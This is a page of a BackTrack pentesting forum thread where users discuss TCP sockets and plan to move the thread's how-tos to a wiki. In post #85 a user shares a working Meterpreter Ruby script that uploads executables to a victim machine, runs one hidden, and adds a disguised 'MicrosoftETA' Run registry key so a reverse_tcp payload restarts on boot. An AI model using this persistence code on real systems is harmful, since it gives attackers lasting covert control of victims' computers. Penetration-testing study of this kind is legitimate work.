Page 9 of 13 FirstFirst ... 7891011 ... LastLast
Results 81 to 90 of 123

Thread: Pentesting Documentation

  1. #81
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    I like the pictures. Funny. Is that a monkey head on the client?


    I don't know much about Java sockets, not being a Java programmer, but the description on that page about sockets does not describe the way sockets are normally created over TCP, for example between a web server and client.

    An example:

    A web server listens on TCP port 80.

    A client, wanting to make a request to the server, picks a local client TCP port number (say 1198) and sends a TCP segment with the SYN flag set from that source port to the webserver on destination port 80. (So the client port is chosen by the client before its first communication)

    The server responds with a TCP segment to destination port 1198 source port 80 with the SYN and ACK flags set. The client the sends a segment with an ACK flag set from TCP source port 1198 and TCP destination port 80. The three way handshake is now complete and the systems have a socket to communicate over, using the given ports.

    Neither the server or the client will change their port numbers during this conversation, all communication in this socket goes between TCP ports 1198 and 80. The combination of the two IP addresses and two TCP port numbers from the server and client can uniquely identify the socket, to keep it separate from other sockets running over port 80 on the same web server. The server or client can use that socket to create new sockets for communication (like the Unix portmapper, FTP servers, etc), but TCP itself does not require it, and most client/server applications just use regular TCP sockets as described above.

    You can confirm this by performing a packet capture between a web server and client.

    Its possible that the link you provided meant something else by the word "port", but in terms or TCP ports (and UDP ports as well by the way), its not correct.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  2. #82
    Junior Member AnActivist's Avatar
    Join Date
    Apr 2009
    Posts
    77

    Default

    Shoot how embarrassing. Well, I found this quote from the website, perhaps you are correct that the below example is java specific?
    The Java environment is highly regarded in part because of its suitability for writing programs that use and interact with the resources on the Internet and the World Wide Web. In fact, Java-capable browsers use this ability of the Java environment to the extreme to transport and run applets over the net.
    Edit: I'm reading up on sockets over TCP so I'll be back with some more accurate information, and perhaps better pictures

  3. #83

    Default Nice work.

    Well done and thank you for posting and sharing. I enjoyed following the post.
    Looking forward to more.
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  4. #84
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    Quote Originally Posted by AnActivist View Post
    so I'll be back with some more accurate information, and perhaps better pictures
    OK, but keep the monkey head, it gives the pictures character
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  5. #85
    Junior Member AnActivist's Avatar
    Join Date
    Apr 2009
    Posts
    77

    Default

    A while ago BigMac uploaded a very interesting video where he uses windows/meterpreter/reverse_tcp payloads that have been converted into executables along with a nifty ruby script to produce some very interesting results. To make a long story short a payload/executable is executed on the victims computer which then sends a meterpreter session back to the attacker but also executes this script:
    Code:
    print_status("Creating directory")
    client.fs.dir.mkdir("c:\\system")
    client.fs.dir.mkdir("c:\\system\\windows")
    client.fs.file.upload_file("c:\\system\\windows\\wingrab.exe" , "/root/Desktop/Exploits/Project/wingrab.exe")
    client.fs.file.upload_file("c:\\system\\windows\\winview.exe" , "/root/Desktop/Exploits/Project/winview.exe")
    client.sys.process.execute("c:\\system\\windows\\wingrab.exe", nil, {'Hidden' => 'true'})
    
    key = "HKLM\\software\\microsoft\\windows\\currentversion\\run"
    value = "MicrosoftETA"
    data = "c:\\system\\windows\\wingrab.exe"
    type = "REG_SZ"
    root_key, base_key = client.sys.registry.splitkey(key)
    open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
    open_key.set_value(value, client.sys.registry.type2str(type), data)
    print_line("Successful")
    Basically adding another payload/executable to the registry so every time the victim starts their computer this payload is executed. For some reason starting a couple of weeks ago the script started to cause the meterpreter sessions to get in the way of each other and now the script doesn't produce the right results anymore. HDM helped me fix this problem with only two lines of code, however a couple of days ago my BT3 vmware got corrupted and I lost all my data. Now I can't remember how HDM did it but I figured out a way to solve the problem a little bit less elegantly.
    To keep from the meterpreter sessions from getting hung up and re running the above script just add the following lines to the beginning and end:
    NOTE: Watch BigMac's video if any of this is confusing, or check out some other tutorials, this isn't really a how to, more like a contribution to other peoples work, that being said a lot of the file names/ directories could be different.
    Code:
    id = client.sys.process['wingrab.exe']
    if (id == nil)
    ....code from above....
    end
    This should fix the problem. When I have more time I'm going to re write this post so that it makes a little bit more sense. I just thought I would throw it out there to see if anyone else is having this issue of the sessions getting hung up without my addition. Hope this helps someone. Thanks for reading.

    *KMDave I'd like to try and recreate the above problem with someone else. PM me if you want to try it out.

  6. #86
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Quote Originally Posted by thorin View Post
    I think others would appreciate what you've done here. Maybe it should be wiki'fied? http://backtrack.offensive-security.....php/Main_Page
    Anyone else in agreement?

    Personally I think the popularity of the thread is evidence enough but lets get some feedback. I don't want to make AnActivist do anymore work than the community is interested in.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  7. #87
    Junior Member
    Join Date
    Mar 2009
    Posts
    83

    Default

    Quote Originally Posted by thorin View Post
    Anyone else in agreement?

    Personally I think the popularity of the thread is evidence enough but lets get some feedback. I don't want to make AnActivist do anymore work than the community is interested in.
    100% agreed! Wiki this beast!

  8. #88
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by thorin View Post
    Anyone else in agreement?

    Personally I think the popularity of the thread is evidence enough but lets get some feedback. I don't want to make AnActivist do anymore work than the community is interested in.
    I agree it should be on the wiki.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  9. #89
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    Quote Originally Posted by thorin View Post
    Anyone else in agreement?

    Personally I think the popularity of the thread is evidence enough but lets get some feedback. I don't want to make AnActivist do anymore work than the community is interested in.
    Sounds good to me, there's certainly some interesting and useful information here. I assume though that the process of transferring the content to the wiki would require some re-editing and re-formatting (from "post" format to "wiki" format), and pruning of off-topic posts (e.g. the whole ethics discussion), which Im guessing would need to be done by AnActivist, so lets hear what he has to say on the matter.

    AnActivist?
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  10. #90
    Junior Member AnActivist's Avatar
    Join Date
    Apr 2009
    Posts
    77

    Default

    Because of a PM from thorin a couple weeks ago I said that if there was interest I would absolutely post the information I have accumulated to the wiki. I'm honored to give back to the community. I'll get started figuring out how to add the reformatted HowTo's to the wiki right away. Thank you everyone for the recognition.

Page 9 of 13 FirstFirst ... 7891011 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •